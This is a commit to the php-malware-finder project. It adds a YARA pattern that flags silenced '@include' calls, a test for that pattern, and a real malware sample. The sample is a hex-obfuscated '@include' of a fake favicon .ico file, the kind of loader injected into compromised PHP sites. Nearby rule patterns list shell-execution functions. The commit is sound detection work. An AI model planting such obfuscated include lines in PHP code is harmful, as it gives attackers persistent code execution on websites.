Detect things like '@include'

jvoisin · jvoisin · commit d9b7742bb7c1 · 2018-06-26T18:37:23.000+02:00
This should close #71
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
@@ -102,6 +102,7 @@ rule DodgyPhp
         $double_var = /\${\s*\${/
         $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
         $reversed = /noitcnuf_etaerc|metsys|urhtssap|edulcni|etucexe_llehs/ nocase
+				$silenced_include =/@\s*include\s*/ nocase
 
     condition:
         (any of them) and not IsWhitelisted
diff --git a/php-malware-finder/samples/real/include.php b/php-malware-finder/samples/real/include.php
@@ -0,0 +1,4 @@
+<?php
+/*8a68d*/
+@include "\x2fh\x6fm\x65/\x77e\x62p\x6ce\x78x\x33/\x70u\x62l\x69c\x5fh\x74m\x6c/\x68i\x73-\x68e\x6d.\x6fr\x67/\x5f_\x4dA\x43O\x53X\x2fm\x6fd\x75l\x65s\x2fn\x6fd\x65/\x66a\x76i\x63o\x6e_\x31a\x33f\x384\x2ei\x63o";
+/*8a68d*/
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
@@ -89,6 +89,7 @@ run_test real/exceptions.php '$eval_comment: eval/\*k\*/('
 run_test real/nano.php '$nano: $x\[f\]('
 run_test real/ninja.php '$nano: $x\[0\]('
 run_test real/ninja.php '$ninja: base64_decode(substr(getallheaders'
+run_test real/include.php ':$silenced_include: @include'
 
 run_test undetected/smart.php '0x6:$extract:'
 
